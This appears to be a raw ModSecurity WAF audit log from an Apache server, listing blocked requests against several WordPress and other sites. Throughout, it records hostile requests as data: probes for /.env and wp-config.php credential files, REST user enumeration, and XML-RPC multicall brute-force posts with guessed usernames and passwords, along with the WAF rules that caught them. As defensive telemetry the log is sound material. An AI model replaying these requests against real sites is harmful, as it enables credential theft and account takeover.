Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f28905c-Z-- --41909e51-A-- [24/May/2025:12:03:44 +0700] aDFTMPmzt4abyoi_U9nyAwAAAIs 103.236.140.4 36392 103.236.140.4 8181 --41909e51-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 141.170.146.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.170.146.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --41909e51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41909e51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748063024049997 3370 (- - -) Stopwatch2: 1748063024049997 3370; combined=1491, p1=499, p2=954, p3=0, p4=0, p5=37, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41909e51-Z-- --c8b9573e-A-- [24/May/2025:12:15:15 +0700] aDFV4-O2UzDOKMmK0i6cdgAAAAw 103.236.140.4 36582 103.236.140.4 8181 --c8b9573e-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 159.89.127.165 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c8b9573e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8b9573e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748063715456752 970 (- - -) Stopwatch2: 1748063715456752 970; combined=350, p1=305, p2=0, p3=0, p4=0, p5=45, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8b9573e-Z-- --b41d3b5d-A-- [24/May/2025:12:19:51 +0700] aDFW9-O2UzDOKMmK0i6ciQAAAAw 103.236.140.4 36674 103.236.140.4 8181 --b41d3b5d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.194.217.18 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.194.217.18 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b41d3b5d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin8 --b41d3b5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b41d3b5d-E-- --b41d3b5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.194.217.18 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748063991282255 6020 (- - -) Stopwatch2: 1748063991282255 6020; combined=4254, p1=524, p2=3560, p3=0, p4=0, p5=103, sr=91, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b41d3b5d-Z-- --8af2904f-A-- [24/May/2025:12:33:28 +0700] aDFaKOunkxaVeh4NwhbNhAAAAEY 103.236.140.4 37008 103.236.140.4 8181 --8af2904f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8af2904f-C-- system.multicallmethodNamewp.getUsersBlogsparamssuperadminantix789 --8af2904f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8af2904f-E-- --8af2904f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748064808446535 19972 (- - -) Stopwatch2: 1748064808446535 19972; combined=31602, p1=503, p2=3746, p3=0, p4=0, p5=13693, sr=94, sw=67, l=0, gc=13593 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8af2904f-Z-- --812dd259-A-- [24/May/2025:12:33:56 +0700] aDFaROunkxaVeh4NwhbNigAAAFU 103.236.140.4 37028 103.236.140.4 8181 --812dd259-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 122.117.102.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 122.117.102.125 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --812dd259-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix!@#$% --812dd259-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --812dd259-E-- --812dd259-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 122.117.102.125 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748064836288926 5783 (- - -) Stopwatch2: 1748064836288926 5783; combined=4130, p1=543, p2=3415, p3=0, p4=0, p5=102, sr=135, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --812dd259-Z-- --0d3c4404-A-- [24/May/2025:12:34:50 +0700] aDFaevmzt4abyoi_U9nyVAAAAJE 103.236.140.4 37066 103.236.140.4 8181 --0d3c4404-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0d3c4404-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix10 --0d3c4404-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d3c4404-E-- --0d3c4404-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748064890910647 5648 (- - -) Stopwatch2: 1748064890910647 5648; combined=3954, p1=463, p2=3318, p3=0, p4=0, p5=101, sr=86, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d3c4404-Z-- --77b9d724-A-- [24/May/2025:13:11:22 +0700] aDFjCvmzt4abyoi_U9n7kgAAAIg 103.236.140.4 46544 103.236.140.4 8181 --77b9d724-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1 Accept-Charset: utf-8 --77b9d724-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77b9d724-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748067082334431 657 (- - -) Stopwatch2: 1748067082334431 657; combined=270, p1=240, p2=0, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77b9d724-Z-- --a1348a28-A-- [24/May/2025:13:15:52 +0700] aDFkGDvI5DIWBJ2mFG5JjAAAAMs 103.236.140.4 46982 103.236.140.4 8181 --a1348a28-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 128.199.182.152 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 128.199.182.152 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a1348a28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1348a28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748067352094371 768 (- - -) Stopwatch2: 1748067352094371 768; combined=288, p1=251, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1348a28-Z-- --c3c46544-A-- [24/May/2025:13:19:56 +0700] aDFlDPmzt4abyoi_U9n8_QAAAIo 103.236.140.4 47836 103.236.140.4 8181 --c3c46544-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 143.198.197.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.197.57 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36 Accept: */* --c3c46544-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3c46544-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748067596255871 736 (- - -) Stopwatch2: 1748067596255871 736; combined=261, p1=226, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3c46544-Z-- --5e22ba7f-A-- [24/May/2025:13:35:25 +0700] aDForTvI5DIWBJ2mFG5KrAAAAMU 103.236.140.4 49966 103.236.140.4 8181 --5e22ba7f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.232.44.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.232.44.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5e22ba7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e22ba7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748068525532529 3115 (- - -) Stopwatch2: 1748068525532529 3115; combined=1345, p1=443, p2=870, p3=0, p4=0, p5=32, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e22ba7f-Z-- --aa072945-A-- [24/May/2025:13:50:22 +0700] aDFsLuunkxaVeh4NwhbRQQAAAEU 103.236.140.4 50280 103.236.140.4 8181 --aa072945-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.210.124.106 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.210.124.106 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --aa072945-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix!!! --aa072945-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa072945-E-- --aa072945-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.210.124.106 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748069422386586 4657 (- - -) Stopwatch2: 1748069422386586 4657; combined=3557, p1=389, p2=3010, p3=0, p4=0, p5=93, sr=76, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa072945-Z-- --a22b2d1f-A-- [24/May/2025:13:54:57 +0700] aDFtQeunkxaVeh4NwhbRVgAAAE8 103.236.140.4 50352 103.236.140.4 8181 --a22b2d1f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.210.124.106 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.210.124.106 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a22b2d1f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinAdmin2024 --a22b2d1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a22b2d1f-E-- --a22b2d1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.210.124.106 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748069697473326 4877 (- - -) Stopwatch2: 1748069697473326 4877; combined=3795, p1=369, p2=3232, p3=0, p4=0, p5=110, sr=72, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a22b2d1f-Z-- --cb6e305b-A-- [24/May/2025:14:00:08 +0700] aDFueDvI5DIWBJ2mFG5K1wAAAMk 103.236.140.4 50434 103.236.140.4 8181 --cb6e305b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.120.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.120.168 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cb6e305b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb6e305b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748070008422815 775 (- - -) Stopwatch2: 1748070008422815 775; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb6e305b-Z-- --d478244b-A-- [24/May/2025:14:03:10 +0700] aDFvLuunkxaVeh4NwhbRgAAAAEY 103.236.140.4 50500 103.236.140.4 8181 --d478244b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d478244b-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinSolihin.2020 --d478244b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d478244b-E-- --d478244b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748070190641217 4685 (- - -) Stopwatch2: 1748070190641217 4685; combined=3542, p1=389, p2=2995, p3=0, p4=0, p5=92, sr=79, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d478244b-Z-- --bbe3e86d-A-- [24/May/2025:14:13:41 +0700] aDFxpeO2UzDOKMmK0i6i0wAAAA4 103.236.140.4 50778 103.236.140.4 8181 --bbe3e86d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.69.98.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.69.98.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bbe3e86d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbe3e86d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748070821931326 2131 (- - -) Stopwatch2: 1748070821931326 2131; combined=1029, p1=370, p2=632, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbe3e86d-Z-- --29fa3520-A-- [24/May/2025:14:27:01 +0700] aDF0xfmzt4abyoi_U9n-qwAAAIY 103.236.140.4 51024 103.236.140.4 8181 --29fa3520-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 196.13.207.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 196.13.207.92 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --29fa3520-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin& --29fa3520-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --29fa3520-E-- --29fa3520-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748071621776202 6535 (- - -) Stopwatch2: 1748071621776202 6535; combined=4695, p1=466, p2=3958, p3=36, p4=42, p5=119, sr=84, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29fa3520-Z-- --eb4d0177-A-- [24/May/2025:14:32:55 +0700] aDF2J_mzt4abyoi_U9n-swAAAJU 103.236.140.4 51112 103.236.140.4 8181 --eb4d0177-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --eb4d0177-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb4d0177-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748071975640161 782 (- - -) Stopwatch2: 1748071975640161 782; combined=327, p1=292, p2=0, p3=0, p4=0, p5=34, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
